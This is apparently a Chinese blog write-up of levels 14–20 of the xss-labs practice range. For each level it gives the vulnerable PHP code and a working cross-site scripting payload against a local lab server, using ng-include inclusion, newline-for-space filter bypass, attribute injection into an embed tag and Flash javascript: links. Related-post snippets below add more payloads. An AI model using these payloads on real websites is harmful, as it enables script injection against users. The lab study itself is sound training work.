xss-labs靶场训练(14-20)

最新推荐文章于 2024-03-22 00:37:58 发布
最新推荐文章于 2024-03-22 00:37:58 发布
阅读量1.7k 收藏 4
点赞数 3
分类专栏: xss 文章标签: javascript xss 信息安全 安全漏洞 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ldzhhh/article/details/106324088
版权

第十四关

这一关iframe调用的文件地址访问失败,已经无法测试了。
在这里插入图片描述
这关主要考察exif xss漏洞,具体可以参考前辈的先知文章:exif xss

第十五关

后台关键代码:

<html ng-app>
<head>
        <meta charset="utf-8">
        <script src="angular.min.js"></script>
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level16.php?keyword=test"; 
}
</script>
<title>欢迎来到level15</title>
</head>
<h1 align=center>欢迎来到第15关,自己想个办法走出去吧!</h1>
<p align=center><img src=level15.png></p>
<?php 
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>

这里主要考查ng-include 指令,该指令用于包含外部的 HTML 文件。
包含的内容将作为指定元素的子节点。
ng-include 属性的值可以是一个表达式,返回一个文件名。
默认情况下,包含的文件需要包含在同一个域名下。
引用文件名要加单引号 即 ng-include=" ‘index.html ’ "
绕过方法:利用ng-include指令的特性包含第一关的HTML文件,并以此触发弹窗
Payload:

 http://192.168.121.129/xss/level15.php?src='http://192.168.121.129/xss/level1.php?name=test<img src=1 οnerrοr=alert(1)>'

第十六关

后台关键代码:

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","&nbsp;",$str);
$str3=str_replace(" ","&nbsp;",$str2);
$str4=str_replace("/","&nbsp;",$str3);
$str5=str_replace("	","&nbsp;",$str4);
echo "<center>".$str5."</center>";
?>
<center><img src=level16.png></center>
<?php

这里过滤了script、空格、/,用换行符%0a(回车)或%0D(回车)取代空格(在HTML中%0a和%0D是可以当成空格使用的)
Payload:

http://192.168.121.129/xss/level16.php?keyword<img%0asrc="1.jpg"%0aonerror=alert(1)>

第十七关

后台关键代码:

<?php
ini_set("display_errors", 0);
echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>

这里用到了<embed> 标签,是用来嵌入图片的。然后arg01和arg02两个变量对特殊字符进行了过滤。可以考虑用onclick或onmouseover事件绕过。因为这两个变量是互相拼接起来的,所以在输入arg02时在b之后加一个空格,当浏览器解析到b的时候就停止判断,然后将onmouseover看作另外一个属性。

Payload:

http://192.168.121.129/xss/level17.php?arg01=a&arg02=b onmouseover=alert(1)

第十八关

后台关键代码:

<?php
ini_set("display_errors", 0);
echo "<embed src=xsf02.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>

这一关的代码基本和十七关一样,只是图片不同而已,所以解法和十七关一样。

第十九关

这关是flash xss,涉及到反编译,暂时搞不懂,先记下payload:

arg01=version&arg02=<a href="javascript:alert(1)">123</a>

第二十关

暂时搞不懂,先记下payload
Payload:

arg01=id&arg02=\%22))}catch(e){}if(!self.a)self.a=!alert(1)//&width&height

这里可以用一种万能的方法触发弹窗,就是编辑HTML手动添加onmouseover时件
在这里插入图片描述
在这里插入图片描述

总结

后面这几关打的有点吃力,主要原因是知识不够全面,之后还得逐步完善自己的知识体系,安全道路任重而道远啊!

参考文章

https://blog.csdn.net/qq_41734243/article/details/105991109?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522159032497919725211935522%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=159032497919725211935522&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allfirst_rank_v2~rank_v28-7-105991109.pc_insert_v8&utm_term=xss-labs

https://blog.csdn.net/qq_43968080/article/details/104725021

见痴
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试之---xss-labs闯【1-14
qq_43168364的博客
04-18 2922
万能检测语句 <SCRscriptIPT>’”()Oonnjavascript 这条语句将给我们本次的闯之旅带来极大的帮助 第一 [Payload:<script>alert(/pig/)</script>] 首先看到了有查询字符串,我们心花怒放了。 先万能检测一下 好家伙啥都没有过滤,那就很easy了 第二 [payload: ”>&......
[网络安全]xss-labs level-14 解题详析
等风来
08-04 2488
以上为[网络安全]xss-labs level-14 解题详析,后续将分享[网络安全]xss-labs level-15 解题详析。我是秋说,我们下次见。
xss-lab靶场详解
最新发布
LS_Sy的博客
03-22 929
pass1-pass4在中已经写过,便不再赘述。
XSS练习平台【XSS Challenges】通秘籍
W小哥
03-02 2159
靶场介绍 靶场地址:http://xss-quiz.int21h.jp/ 相对于别的靶场来说,这是一个模拟真实环境的xss平台,页面不会给出任何提示 Stage #1 访问目标网站如下图所示 提示:注入以下JavaScript命令 “alert(document.domain)” 输入注入语句: 思路:最简单测试方法,没有任何过滤,注入语句在b标签内 Stage #2 注入语句:1">...
XSS-labs靶场实战(五)——第12-14
永远是少年
11-19 796
今天继续给大家介绍渗透测试相知识,本文主要内容是XSS-labs靶场实战第7-8。 一、第十二 二、第十三 三、第十四
XSS-14、15注入靶场(小游戏)——第十四、五
qq_39330735的博客
02-04 955
XSS-15注入靶场(小游戏)——第十五,文件链接注入通详解
xss-labs靶场
10-13
xss-labs靶场 本篇文章将对xss-labs靶场的六源码进行详细的分析和总结,并对每一xss攻击payload进行解释。 第一 xss-labs靶场的第一源码没有做任何过滤,直接上xss payload:<script>alert("XSS")...
WEB渗透学习-XSS-labs靶场
04-20
XSS-labs为WEB渗透中跨站脚本攻击专项练习靶场,内含多种攻击方式,采用卡制,由易到难,适合刚接触该漏洞的新手巩固练习
xss-labs-master源码
07-06
20xss靶场练习,帮助了解xss
xss-labs靶场,直接放到www目录下直接用,超方便
09-24
xss-labs靶场xss挑战卡包含源码,开启小p直接放到www目录下直接用,浏览器访问127.0.0.1/xss-labs
xss-labs-master.zip(xss注入通游戏/靶场
03-21
经典的xss注入通游戏,搭建简单。适合网络安全测试人员
XSSxss-labs-level14
Hugu
02-24 1255
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页或请求该网页中的内容之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码
XSS-labs通
em.....
10-24 4184
XSS-labs通 1.第一 payload: http://xss/level1.php?name=<Script>alert(1)</Script> 2.第二 这里变量出现在两处,我们直接利用第二处,做构造以及闭合 payload: 1"><ScRipt>alert(1)</ScRipt> 3.第三 ​ ​ 用第二的payload去试一下,发现内容没变化,但是就是没当成js代码 ​ 查一下网页源代码和php代码 ​ 看
XSS靶场——14
m0_46203901的博客
09-27 452
完善一些复现的XSS
[靶场] XSS-Labs 14-20
3hex的博客
09-22 1348
由于有FlashXSS,需要配置一下环境,下载Flash和JPEXS(Flash反编译工具)。 14. Level14-图片EXIF注入 这卡的iframe引用的地址打不开,我们自己写一个简单的放在本地服务器上,引用对应的URL就行,同时需要打开php_exif开。 index.php放在根目录,URL为http://127.0.0.1 <?php echo ' <html> <head> <meta http-equiv=.
xss-labs靶场实战全通详细过程(xss靶场详解)
热门推荐
金 帛的博客
07-13 2万+
xss靶场一到二十详细教程
xss靶场挑战之旅总结
weixin_43027842的博客
02-10 3828
第一: 没有做任何的过滤 我们试下 第二: 我们用&quot;&amp;gt; 有转义 参考HTML的转义 输入的 &quot; &amp;gt; &amp;lt; 被做了转义处理,变成了&quot;&amp;gt;&amp;lt; 我们用javascript里边的oninput事件试试 我们用12’ oninput='alert(12) 第四; 做了过滤 用&quot;oninput=&q
XSS靶场level15详细通教程
m0_49434302的博客
07-07 1729
我的一个朋友这些天在家找工作,利用间隙时间重温一下XSS靶场。可是做到第15的时候,怎么也无法通。我这个朋友在15卡住了2天。最后终于找到了问题的根源。【这个朋友使用的是在线靶场,如果你是自己搭建的靶场不会遇到我的问题,只需阅读前半部分即可。】 第一步:查看源码 注意到了一个新朋友:ng-include。 ng-include 指令用于包含外部的HTML文件。包含的内容将作为指定元素的子节点。ng-include属性的值可以是一个表达式,返回一个文件名。默认情况下,包含的文件需要包含在同一域
xss靶场大通(持续更新ing)
weixin_30340353的博客
05-08 1401
xss秘籍第一式(常弹) (1)进入自己搭建的靶场,发现有get请求,参数为name,可进行输入,并会将输入的内容显示于网页页面 (2)使用xss的payload进行通: http://127.0.0.1/xss/level1.php?name=<script>alert(1)</script> ...
xss-labs靶场详解
08-26
对不起,我无法提供有特定靶场 "xss-labs" 的详细通解释,因为我无法直接访问互联网或搜索特定的信息。然而,XSS(跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者将恶意的脚本注入到网页中,从而获取用户敏感信息或在用户浏览器中执行恶意操作。 通常,成功通过XSS-labs靶场键是了解XSS漏洞的原理和常见的防御措施。你可以通过学习相的网络安全知识和参加相训练课程来提高对XSS漏洞的理解和攻防能力。同时,使用漏洞扫描工具和安全审计工具,如Burp Suite、OWASP ZAP等,可以帮助你发现并修复可能存在的XSS漏洞。 请记住,在进行任何安全测试或攻击前,确保获得合法的授权,并遵守适用的法律和道德准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值